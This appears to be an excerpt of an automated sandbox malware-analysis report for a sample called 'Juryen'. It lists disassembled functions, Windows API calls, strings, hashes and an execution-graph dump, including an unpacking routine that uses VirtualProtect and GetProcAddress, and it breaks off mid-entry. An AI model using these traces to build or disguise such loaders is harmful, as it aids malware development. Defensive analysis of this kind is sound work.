                                                                    • String ID: %%-%d.%ds
                                                                    • API String ID: 3988819677-2008345750
                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                    • memset.MSVCRT ref: 00401917
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PlacementWindowmemset
                                                                    • String ID: WinPos
                                                                    • API String ID: 4036792311-2823255486
                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 383090722-1948609170
                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                    • API String ID: 2773794195-880857682
                                                                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                    Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: MZ@
                                                                    • API String ID: 1378638983-2978689999
                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                    Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040A908
                                                                    • free.MSVCRT ref: 0040A92B
                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                    • Opcode Fuzzy Hash: 414ffd522c354c44d911202dbb7fb969b997b2727503747ec2ffb07ed2ee07d7
                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                    Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                    • free.MSVCRT ref: 0040B201
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B224
                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocwcslen
                                                                    • String ID:
                                                                    • API String ID: 726966127-0
                                                                    • Opcode ID: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                    • Opcode Fuzzy Hash: 00a30dcf632695cd8a34016e93c80dbd960092823cc19526dd2896a4ba07b16a
                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID:
                                                                    • API String ID: 231171946-0
                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                    Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                    • free.MSVCRT ref: 0040B0FB
                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                    • free.MSVCRT ref: 0040B12C
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$memcpy$mallocstrlen
                                                                    • String ID:
                                                                    • API String ID: 3669619086-0
                                                                    • Opcode ID: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                    • Opcode Fuzzy Hash: 4b44bdb18b20ed3b2c0c3afb5fa92155fa3f083da651cc3e9fadc8496464885a
                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                    Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                    • malloc.MSVCRT ref: 00417407
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                    • free.MSVCRT ref: 00417425
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                    • Opcode Fuzzy Hash: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1961120804-0
                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:20%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:867
                                                                    Total number of Limit Nodes:21
                                                                    execution_graph 34100 40fc40 70 API calls 34273 403640 21 API calls 34101 427fa4 42 API calls 34274 412e43 _endthreadex 34275 425115 76 API calls __fprintf_l 34276 43fe40 133 API calls 34104 425115 83 API calls __fprintf_l 34105 401445 memcpy memcpy DialogBoxParamA 34106 440c40 34 API calls 34108 411853 RtlInitializeCriticalSection memset 34109 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34282 40a256 13 API calls 34284 432e5b 17 API calls 34286 43fa5a 20 API calls 34111 401060 41 API calls 34289 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34291 405e69 14 API calls 34116 433068 15 API calls __fprintf_l 34293 414a6d 18 API calls 34294 43fe6f 134 API calls 34118 424c6d 15 API calls __fprintf_l 34295 426741 19 API calls 34120 440c70 17 API calls 34121 443c71 44 API calls 34124 427c79 24 API calls 34298 416e7e memset __fprintf_l 34128 42800b 47 API calls 34129 425115 85 API calls __fprintf_l 34301 41960c 61 API calls 34130 43f40c 122 API calls __fprintf_l 34133 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34134 43f81a 20 API calls 34136 414c20 memset memset 34137 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34305 414625 18 API calls 34306 404225 modf 34307 403a26 strlen WriteFile 34309 40422a 12 API calls 34313 427632 memset memset memcpy 34314 40ca30 59 API calls 34315 404235 26 API calls 34138 42ec34 61 API calls __fprintf_l 34139 425115 76 API calls __fprintf_l 34316 425115 77 API calls __fprintf_l 34318 44223a 38 API calls 34145 43183c 112 API calls 34319 44b2c5 _onexit __dllonexit 34324 42a6d2 memcpy __allrem 34147 405cda 65 API calls 34332 43fedc 138 API calls 34333 4116e1 16 API calls __fprintf_l 34150 4244e6 19 API calls 34152 42e8e8 127 API calls __fprintf_l 34153 4118ee RtlLeaveCriticalSection 34338 43f6ec 22 API calls 34155 425115 119 API calls __fprintf_l 33158 410cf3 EnumResourceNamesA 34341 4492f0 memcpy memcpy 34343 43fafa 18 API calls 34345 4342f9 15 API calls __fprintf_l 34156 4144fd 19 API calls 34347 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34348 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34351 443a84 _mbscpy 34353 43f681 17 API calls 34159 404487 22 API calls 34355 415e8c 16 API calls __fprintf_l 34163 411893 RtlDeleteCriticalSection __fprintf_l 34164 41a492 42 API calls 34359 403e96 34 API calls 34360 410e98 memset SHGetPathFromIDList SendMessageA 34166 426741 109 API calls __fprintf_l 34167 4344a2 18 API calls 34168 4094a2 10 API calls 34363 4116a6 15 API calls __fprintf_l 34364 43f6a4 17 API calls 34365 440aa3 20 API calls 34367 427430 45 API calls 34171 4090b0 7 API calls 34172 4148b0 15 API calls 34174 4118b4 RtlEnterCriticalSection 34175 4014b7 CreateWindowExA 34176 40c8b8 19 API calls 34178 4118bf RtlTryEnterCriticalSection 34372 42434a 18 API calls __fprintf_l 34374 405f53 12 API calls 34186 43f956 59 API calls 34188 40955a 17 API calls 34189 428561 36 API calls 34190 409164 7 API calls 34378 404366 19 API calls 34382 40176c ExitProcess 34385 410777 42 API calls 34195 40dd7b 51 API calls 34196 425d7c 16 API calls __fprintf_l 34387 43f6f0 25 API calls 34388 42db01 22 API calls 34197 412905 15 API calls __fprintf_l 34389 403b04 54 API calls 34390 405f04 SetDlgItemTextA GetDlgItemTextA 34391 44b301 ??3@YAXPAX 34394 4120ea 14 API calls 3 library calls 34395 40bb0a 8 API calls 34397 413f11 strcmp 34201 434110 17 API calls __fprintf_l 34204 425115 108 API calls __fprintf_l 34398 444b11 _onexit 34206 425115 76 API calls __fprintf_l 34209 429d19 10 API calls 34401 444b1f __dllonexit 34402 409f20 _strcmpi 34211 42b927 31 API calls 34405 433f26 19 API calls __fprintf_l 34406 44b323 FreeLibrary 34407 427f25 46 API calls 34408 43ff2b 17 API calls 34409 43fb30 19 API calls 34218 414d36 16 API calls 34220 40ad38 7 API calls 34411 433b38 16 API calls __fprintf_l 34091 44b33b 34092 44b344 ??3@YAXPAX 34091->34092 34093 44b34b 34091->34093 34092->34093 34094 44b354 ??3@YAXPAX 34093->34094 34095 44b35b 34093->34095 34094->34095 34096 44b364 ??3@YAXPAX 34095->34096 34097 44b36b 34095->34097 34096->34097 34098 44b374 ??3@YAXPAX 34097->34098 34099 44b37b 34097->34099 34098->34099 34224 426741 21 API calls 34225 40c5c3 125 API calls 34227 43fdc5 17 API calls 34412 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34230 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 775 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 775 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33286 410d0e 33230->33286 33232 40cf6f 33290 40ccd7 ??2@YAPAXI 33232->33290 33234 40cf9b 33304 407cbc 33234->33304 33239 40cfc4 33322 409825 memset 33239->33322 33240 40cfd8 33327 4096f4 memset 33240->33327 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33351 407948 free free 33247->33351 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 